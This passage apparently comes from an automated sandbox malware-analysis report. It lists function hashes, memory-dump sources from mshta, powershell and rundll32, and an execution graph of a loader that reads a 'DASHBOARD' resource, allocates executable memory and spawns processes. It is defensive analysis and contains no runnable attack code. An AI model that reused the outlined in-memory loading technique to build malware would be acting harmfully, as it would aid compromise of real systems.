                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A3000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction ID: 36d81037a0c918aa953a939c86cac6adfacf82f9f2a3bd65559d96b6155daffb
                                                                                                                      • Opcode Fuzzy Hash: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction Fuzzy Hash: F4D0A9255097C40FC302B378044A12CBA518B01288B2800CF84868B182DD0A4D848212
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 03110FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Executed Functions

                                                                                                                      Function 000007FF002508A5 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.679743362.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 3c68071f839a19810fcab8dfe5bcfc32094b8e701f2bb993a88eeafe49c60160
                                                                                                                      • Instruction ID: 30eaa00d93f0420fc23e5b843629076b272696860e8128162f7039f61d42fa8a
                                                                                                                      • Opcode Fuzzy Hash: 3c68071f839a19810fcab8dfe5bcfc32094b8e701f2bb993a88eeafe49c60160
                                                                                                                      • Instruction Fuzzy Hash: 0D41C06190E7C24FEB57577858AA2607FB0AF17215F5E04EBC088CF0E3E9584C5AC722
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000007FF00250A21 Relevance: .3, Instructions: 315COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.679743362.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 81ae09296444d8af2a2b1df3c29d15e472083d43b3300ce7dd884d268f09a93d
                                                                                                                      • Instruction ID: f579ef670a995e08645a6d04ebed502a0e09dd24c255dc7594b3f6fbfa795a77
                                                                                                                      • Opcode Fuzzy Hash: 81ae09296444d8af2a2b1df3c29d15e472083d43b3300ce7dd884d268f09a93d
                                                                                                                      • Instruction Fuzzy Hash: DB717961A0EBC60FEB13577858667657FB0AF17215F1E40EBC488CB0E3D958985AC362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31784 10035042 TlsGetValue 31785 10035076 GetModuleHandleA 31784->31785 31786 10035055 31784->31786 31788 10035085 GetProcAddress 31785->31788 31789 1003509f 31785->31789 31786->31785 31787 1003505f TlsGetValue 31786->31787 31791 1003506a 31787->31791 31790 1003506e 31788->31790 31790->31789 31792 10035095 RtlEncodePointer 31790->31792 31791->31785 31791->31790 31792->31789 31793 10020c26 31794 10020c32 __EH_prolog3 31793->31794 31796 10020c80 31794->31796 31804 1002083b EnterCriticalSection 31794->31804 31818 100201f1 RaiseException __CxxThrowException@8 31794->31818 31819 1002094b TlsAlloc InitializeCriticalSection 31794->31819 31820 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31796->31820 31799 10020c8d 31801 10020ca6 ~_Task_impl 31799->31801 31802 10020c93 31799->31802 31821 100209ed 88 API calls 5 library calls 31802->31821 31809 1002085a 31804->31809 31805 10020916 _memset 31806 1002092a LeaveCriticalSection 31805->31806 31806->31794 31807 10020893 31822 10014460 31807->31822 31808 100208a8 GlobalHandle GlobalUnlock 31811 10014460 ctype 80 API calls 31808->31811 31809->31805 31809->31807 31809->31808 31813 100208c5 GlobalReAlloc 31811->31813 31814 100208cf 31813->31814 31815 100208f7 GlobalLock 31814->31815 31816 100208da GlobalHandle GlobalLock 31814->31816 31817 100208e8 LeaveCriticalSection 31814->31817 31815->31805 31816->31817 31817->31815 31819->31794 31820->31799 31821->31801 31823 10014477 ctype 31822->31823 31824 1001448c GlobalAlloc 31823->31824 31826 10013ba0 80 API calls _DebugHeapAllocator 31823->31826 31824->31814 31826->31824 31827 10030d06 31828 10030d12 31827->31828 31829 10030d0d 31827->31829 31833 10030c10 31828->31833 31845 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31829->31845 31832 10030d23 31834 10030c1c ___DllMainCRTStartup 31833->31834 31839 10030c69 31834->31839 31843 10030cb9 ___DllMainCRTStartup 31834->31843 31846 10030a37 31834->31846 31838 10030c99 31841 10030a37 __CRT_INIT@12 165 API calls 31838->31841 31838->31843 31839->31843 31900 100125c0 31839->31900 31840 100125c0 ___DllMainCRTStartup 146 API calls 31842 10030c90 31840->31842 31841->31843 31844 10030a37 __CRT_INIT@12 165 API calls 31842->31844 31843->31832 31844->31838 31845->31828 31847 10030b61 31846->31847 31848 10030a4a GetProcessHeap HeapAlloc 31846->31848 31850 10030b67 31847->31850 31851 10030b9c 31847->31851 31849 10030a6e GetVersionExA 31848->31849 31865 10030a67 31848->31865 31852 10030a89 GetProcessHeap HeapFree 31849->31852 31853 10030a7e GetProcessHeap HeapFree 31849->31853 31858 10030b86 31850->31858 31850->31865 31948 100310be 67 API calls _doexit 31850->31948 31854 10030ba1 31851->31854 31855 10030bfa 31851->31855 31856 10030ab5 31852->31856 31853->31865 31932 10035135 6 API calls __decode_pointer 31854->31932 31855->31865 31967 10035425 79 API calls 2 library calls 31855->31967 31922 10036624 HeapCreate 31856->31922 31858->31865 31949 100389ee 68 API calls __CRT_INIT@12 31858->31949 31859 10030ba6 31933 10035840 31859->31933 31865->31839 31866 10030aeb 31866->31865 31869 10030af4 31866->31869 31867 10030b90 31950 10035178 70 API calls 2 library calls 31867->31950 31939 1003548e 78 API calls 6 library calls 31869->31939 31871 10030bbe 31952 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31871->31952 31873 10030af9 __RTC_Initialize 31879 10030b0c GetCommandLineA 31873->31879 31893 10030afd 31873->31893 31874 10030b95 31951 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31874->31951 31876 10030bd0 31880 10030bd7 31876->31880 31881 10030bee 31876->31881 31941 10038d66 77 API calls 3 library calls 31879->31941 31953 100351b5 67 API calls 4 library calls 31880->31953 31954 1002fa69 31881->31954 31885 10030b1c 31942 100387ae 72 API calls 3 library calls 31885->31942 31886 10030bde GetCurrentThreadId 31886->31865 31888 10030b26 31889 10030b2a 31888->31889 31944 10038cad 111 API calls 3 library calls 31888->31944 31943 10035178 70 API calls 2 library calls 31889->31943 31892 10030b36 31894 10030b4a 31892->31894 31945 10038a3a 110 API calls 6 library calls 31892->31945 31940 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31893->31940 31899 10030b02 31894->31899 31947 100389ee 68 API calls __CRT_INIT@12 31894->31947 31897 10030b3f 31897->31894 31946 10030f4d 75 API calls 4 library calls 31897->31946 31899->31865 31993 10006a90 31900->31993 31903 1001265a 32027 1002fe65 105 API calls 6 library calls 31903->32027 31904 1001261c FindResourceW LoadResource SizeofResource 31907 10006a90 ___DllMainCRTStartup 67 API calls 31904->31907 31910 10012744 ___DllMainCRTStartup 31907->31910 31909 1001284d 31909->31838 31909->31840 31911 100127b7 VirtualAlloc 31910->31911 31912 1001279b VirtualAllocExNuma 31910->31912 31913 100127da 31911->31913 31912->31913 31998 1002fb00 31913->31998 31917 100127fa 32021 10002970 31917->32021 31919 10012810 ___DllMainCRTStartup 32024 100026a0 31919->32024 31921 10012664 32028 1002f81e 5 API calls __invoke_watson 31921->32028 31923 10036647 31922->31923 31924 10036644 31922->31924 31968 100365c9 67 API calls 3 library calls 31923->31968 31924->31866 31926 1003664c 31927 10036656 31926->31927 31928 1003667a 31926->31928 31969 10035aca HeapAlloc 31927->31969 31928->31866 31930 10036660 31930->31928 31931 10036665 HeapDestroy 31930->31931 31931->31924 31932->31859 31934 10035844 31933->31934 31936 10030bb2 31934->31936 31937 10035864 Sleep 31934->31937 31970 10030678 31934->31970 31936->31865 31936->31871 31938 10035879 31937->31938 31938->31934 31938->31936 31939->31873 31940->31899 31941->31885 31942->31888 31943->31893 31944->31892 31945->31897 31946->31894 31947->31889 31948->31858 31949->31867 31950->31874 31951->31865 31952->31876 31953->31886 31955 1002fa75 ___DllMainCRTStartup 31954->31955 31963 1002faee __dosmaperr ___DllMainCRTStartup 31955->31963 31966 1002fab4 31955->31966 31989 10035a99 67 API calls 2 library calls 31955->31989 31956 1002fac9 HeapFree 31958 1002fadb 31956->31958 31956->31963 31992 100311f4 67 API calls __getptd_noexit 31958->31992 31960 1002fae0 GetLastError 31960->31963 31961 1002faa6 31991 1002fabf LeaveCriticalSection _doexit 31961->31991 31962 1002fa8c ___sbh_find_block 31962->31961 31990 10035b3d VirtualFree VirtualFree HeapFree __shift 31962->31990 31963->31899 31966->31956 31966->31963 31967->31865 31968->31926 31969->31930 31971 10030684 ___DllMainCRTStartup 31970->31971 31972 1003069c 31971->31972 31982 100306bb _memset 31971->31982 31983 100311f4 67 API calls __getptd_noexit 31972->31983 31974 100306a1 31984 10037753 4 API calls 2 library calls 31974->31984 31975 100306b1 ___DllMainCRTStartup 31975->31934 31977 1003072d RtlAllocateHeap 31977->31982 31982->31975 31982->31977 31985 10035a99 67 API calls 2 library calls 31982->31985 31986 100362e6 5 API calls 2 library calls 31982->31986 31987 10030774 LeaveCriticalSection _doexit 31982->31987 31988 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31982->31988 31983->31974 31985->31982 31986->31982 31987->31982 31988->31982 31989->31962 31990->31961 31991->31966 31992->31960 31994 1002f9a6 _malloc 67 API calls 31993->31994 31996 10006aa1 31994->31996 31995 10006aad 31995->31903 31995->31904 31996->31995 31997 1002fa69 __CRT_INIT@12 67 API calls 31996->31997 31997->31995 31999 1002fb18 31998->31999 32000 1002fb3f __VEC_memcpy 31999->32000 32001 100127eb 31999->32001 32000->32001 32002 1002f9a6 32001->32002 32003 1002fa53 32002->32003 32014 1002f9b4 32002->32014 32036 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32003->32036 32005 1002fa59 32037 100311f4 67 API calls __getptd_noexit 32005->32037 32008 1002fa5f 32008->31917 32011 1002fa17 RtlAllocateHeap 32011->32014 32012 1002f9c9 32012->32014 32029 10036892 67 API calls __NMSG_WRITE 32012->32029 32030 100366f2 67 API calls 6 library calls 32012->32030 32031 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32012->32031 32014->32011 32014->32012 32015 1002fa4a 32014->32015 32016 1002fa3e 32014->32016 32019 1002fa3c 32014->32019 32032 1002f957 67 API calls 4 library calls 32014->32032 32033 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32014->32033 32015->31917 32034 100311f4 67 API calls __getptd_noexit 32016->32034 32035 100311f4 67 API calls __getptd_noexit 32019->32035 32022 1002f9a6 _malloc 67 API calls 32021->32022 32023 10002990 32022->32023 32023->31919 32038 10002280 32024->32038 32027->31921 32028->31909 32029->32012 32030->32012 32032->32014 32033->32014 32034->32019 32035->32015 32036->32005 32037->32008 32075 10001990 32038->32075 32041 100022c3 SetLastError 32072 100022a9 32041->32072 32042 100022d5 32043 10001990 ___DllMainCRTStartup SetLastError 32042->32043 32044 100022ee 32043->32044 32045 10002310 SetLastError 32044->32045 32046 10002322 32044->32046 32044->32072 32045->32072 32047 10002331 SetLastError 32046->32047 32048 10002343 32046->32048 32047->32072 32049 1000234e SetLastError 32048->32049 32051 10002360 GetNativeSystemInfo 32048->32051 32049->32072 32052 10002414 SetLastError 32051->32052 32053 10002426 VirtualAlloc 32051->32053 32052->32072 32054 10002472 GetProcessHeap HeapAlloc 32053->32054 32055 10002447 VirtualAlloc 32053->32055 32057 100024ac 32054->32057 32058 1000248c VirtualFree SetLastError 32054->32058 32055->32054 32056 10002463 SetLastError 32055->32056 32056->32072 32059 10001990 ___DllMainCRTStartup SetLastError 32057->32059 32058->32072 32060 1000250e 32059->32060 32061 1000251c VirtualAlloc 32060->32061 32069 10002512 32060->32069 32062 1000254b ___DllMainCRTStartup 32061->32062 32078 100019c0 32062->32078 32065 1000257f ___DllMainCRTStartup 32065->32069 32088 10001ff0 32065->32088 32113 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32069->32113 32070 100025e8 ___DllMainCRTStartup 32070->32069 32070->32072 32107 35d80c 32070->32107 32072->31921 32073 1000264f SetLastError 32073->32069 32076 1000199f SetLastError 32075->32076 32077 100019ab 32075->32077 32076->32077 32077->32041 32077->32042 32077->32072 32079 100019f0 32078->32079 32080 10001a83 32079->32080 32081 10001a2c VirtualAlloc 32079->32081 32087 10001aa0 ___DllMainCRTStartup 32079->32087 32082 10001990 ___DllMainCRTStartup SetLastError 32080->32082 32083 10001a50 32081->32083 32085 10001a57 ___DllMainCRTStartup 32081->32085 32084 10001a9c 32082->32084 32083->32087 32086 10001aa4 VirtualAlloc 32084->32086 32084->32087 32085->32079 32086->32087 32087->32065 32089 10002029 IsBadReadPtr 32088->32089 32098 1000201f 32088->32098 32091 10002053 32089->32091 32089->32098 32092 10002085 SetLastError 32091->32092 32093 10002099 32091->32093 32091->32098 32092->32098 32114 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32093->32114 32095 100020b3 32096 100020bf SetLastError 32095->32096 32100 100020e9 32095->32100 32096->32098 32098->32069 32101 10001cb0 32098->32101 32099 100021f9 SetLastError 32099->32098 32100->32098 32100->32099 32102 10001cf8 ___DllMainCRTStartup 32101->32102 32103 10001e01 32102->32103 32105 10001ddd 32102->32105 32115 10001b80 32102->32115 32104 10001b80 ___DllMainCRTStartup 2 API calls 32103->32104 32104->32105 32105->32070 32108 35d8a5 32107->32108 32109 35d8cc 32107->32109 32122 355cf9 32108->32122 32109->32072 32109->32073 32113->32072 32114->32095 32116 10001b9c 32115->32116 32119 10001b92 32115->32119 32117 10001c04 VirtualProtect 32116->32117 32120 10001baa 32116->32120 32117->32119 32119->32102 32120->32119 32121 10001be2 VirtualFree 32120->32121 32121->32119 32132 356288 32122->32132 32123 35648d 32146 349700 32123->32146 32126 35648b 32126->32109 32135 353cbb 32126->32135 32130 34ab66 GetPEB 32130->32132 32132->32123 32132->32126 32132->32130 32133 34ae03 GetPEB 32132->32133 32138 35fc96 32132->32138 32142 34ea7b 32132->32142 32156 361310 32132->32156 32160 3612a8 GetPEB 32132->32160 32161 34e7ce GetPEB 32132->32161 32162 35e35a GetPEB 32132->32162 32133->32132 32136 342d9f GetPEB 32135->32136 32137 353d36 ExitProcess 32136->32137 32137->32109 32139 35fcac 32138->32139 32163 342d9f 32139->32163 32143 34ea9f 32142->32143 32144 342d9f GetPEB 32143->32144 32145 34eb24 SHGetFolderPathW 32144->32145 32145->32132 32147 34972e 32146->32147 32148 361310 GetPEB 32147->32148 32149 349995 32148->32149 32171 35679c 32149->32171 32151 3499d1 32155 3499dc 32151->32155 32175 354dad GetPEB 32151->32175 32153 3499fc 32176 354dad GetPEB 32153->32176 32155->32126 32157 36132d 32156->32157 32177 343efe 32157->32177 32160->32132 32161->32132 32162->32132 32164 342e80 lstrcmpiW 32163->32164 32165 342e5b 32163->32165 32164->32132 32169 35c761 GetPEB 32165->32169 32167 342e6a 32170 34f2c1 GetPEB 32167->32170 32169->32167 32170->32164 32172 3567d5 32171->32172 32173 342d9f GetPEB 32172->32173 32174 356847 CreateProcessW 32173->32174 32174->32151 32175->32153 32176->32155 32178 343f17 32177->32178 32181 343cd1 32178->32181 32182 343cec 32181->32182 32183 342d9f GetPEB 32182->32183 32184 343d79 32183->32184 32184->32132

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

